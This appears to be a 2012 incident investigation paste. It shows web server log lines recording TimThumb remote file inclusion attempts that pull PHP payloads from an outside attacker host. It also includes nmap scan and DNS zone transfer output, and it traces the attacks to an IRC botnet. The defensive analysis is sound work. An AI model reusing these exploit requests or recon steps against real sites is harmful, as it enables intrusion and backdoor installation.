justicesolutionsllc

a guest
May 28th, 2012
server1.justicesolutionsllc.com - - [28/May/2012:09:57:59 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
server1.justicesolutionsllc.com - - [28/May/2012:09:59:26 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/lin.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
server1.justicesolutionsllc.com - - [28/May/2012:09:59:26 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/both.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
server1.justicesolutionsllc.com - - [28/May/2012:09:59:27 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/lin.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/both.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"

http://justicesolutionsllc.com/

nmap --open --reason --script dns-zone-transfer.nse justicesolutionsllc.com
Starting Nmap 6.00 ( http://nmap.org ) at 2012-05-28 18:38 Eastern Daylight Time

Nmap scan report for justicesolutionsllc.com (216.67.225.113)
Host is up, received reset (0.026s latency).
rDNS record for 216.67.225.113: server1.justicesolutionsllc.com
Not shown: 979 closed ports
Reason: 979 resets

PORT STATE SERVICE REASON
1/tcp open tcpmux syn-ack
21/tcp open ftp syn-ack
25/tcp open smtp syn-ack
53/tcp open domain syn-ack
| dns-zone-transfer:
| justicesolutionsllc.com SOA ns1.justicesolutionsllc.com dnsadmin.server1.justicesolutionsllc.com
| justicesolutionsllc.com MX justicesolutionsllc.com
| justicesolutionsllc.com NS ns1.justicesolutionsllc.com
| justicesolutionsllc.com NS ns2.justicesolutionsllc.com
| justicesolutionsllc.com A 216.67.225.113
| cpanel.justicesolutionsllc.com A 216.67.225.113
| ftp.justicesolutionsllc.com A 216.67.225.113
| localhost.justicesolutionsllc.com A 127.0.0.1
| mail.justicesolutionsllc.com CNAME justicesolutionsllc.com
| ns1.justicesolutionsllc.com A 216.67.225.113
| ns2.justicesolutionsllc.com A 208.116.44.41
| server1.justicesolutionsllc.com A 208.116.44.41
| webdisk.justicesolutionsllc.com A 216.67.225.113
| webmail.justicesolutionsllc.com A 216.67.225.113
| whm.justicesolutionsllc.com A 216.67.225.113
| www.justicesolutionsllc.com CNAME justicesolutionsllc.com
|_justicesolutionsllc.com SOA ns1.justicesolutionsllc.com dnsadmin.server1.justicesolutionsllc.com
80/tcp open http syn-ack
100/tcp open newacct syn-ack
110/tcp open pop3 syn-ack
111/tcp open rpcbind syn-ack
143/tcp open imap syn-ack
443/tcp open https syn-ack
465/tcp open smtps syn-ack
587/tcp open submission syn-ack
993/tcp open imaps syn-ack
995/tcp open pop3s syn-ack
3306/tcp open mysql syn-ack
6667/tcp open irc syn-ack
6668/tcp open irc syn-ack
6669/tcp open irc syn-ack
7000/tcp open afs3-fileserver syn-ack
8000/tcp open http-alt syn-ack
8001/tcp open vcom-tunnel syn-ack

| server1.justicesolutionsllc.com A 208.116.44.41
208.116.44.41 redirects to wylandflorida.com
Non-authoritative answer:
Name: wylandflorida.com
Address: 216.67.225.113

wylandflorida.com comes back to 216.67.225.113 which aliases to server1.justicesolutionsllc.com

http://justicesolutionsllc.com:6669 = irc.siantar.org

:server1.siantar.org NOTICE AUTH :*** Looking up your hostname...
:server1.siantar.org NOTICE AUTH :*** Checking ident...
:server1.siantar.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:server1.siantar.org NOTICE AUTH :*** No ident response; username prefixed with ~
:server1.siantar.org 451 GET :You have not registered
:server1.siantar.org 451 User-Agent: :You have not registered
:server1.siantar.org 451 Host: :You have not registered
:server1.siantar.org 451 Accept: :You have not registered
:server1.siantar.org 451 Accept-Language: :You have not registered
:server1.siantar.org 451 Accept-Encoding: :You have not registered
:server1.siantar.org 451 Connection: :You have not registered

PING irc.siantar.org (173.44.171.98) 56(84) bytes of data.
http://173.44.171.98:6669/
:server2.siantar.org NOTICE AUTH :*** Looking up your hostname...
:server2.siantar.org NOTICE AUTH :*** Checking ident...
:server2.siantar.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:server2.siantar.org NOTICE AUTH :*** No ident response; username prefixed with ~
:server2.siantar.org 451 GET :You have not registered
:server2.siantar.org 451 User-Agent: :You have not registered
:server2.siantar.org 451 Host: :You have not registered
:server2.siantar.org 451 Accept: :You have not registered
:server2.siantar.org 451 Accept-Language: :You have not registered
:server2.siantar.org 451 Accept-Encoding: :You have not registered
:server2.siantar.org 451 Connection: :You have not registered

siantar.org redirects to http://globalnetsiantar.blogspot.com/

http://blogger.com.lochin.org/

Non-authoritative answer:
Name: lochin.org
Address: 94.141.22.74

Non-authoritative answer:
Name: blogger.com.lochin.org
Address: 94.141.22.74

Name: srv-hp6.netsons.net
Address: 94.141.22.74

____________________________________________

The irc.siantar.org channels are used to scan websites for TimThumb vulnerabilities; bots post back their findings and list the backdoors installed on servers.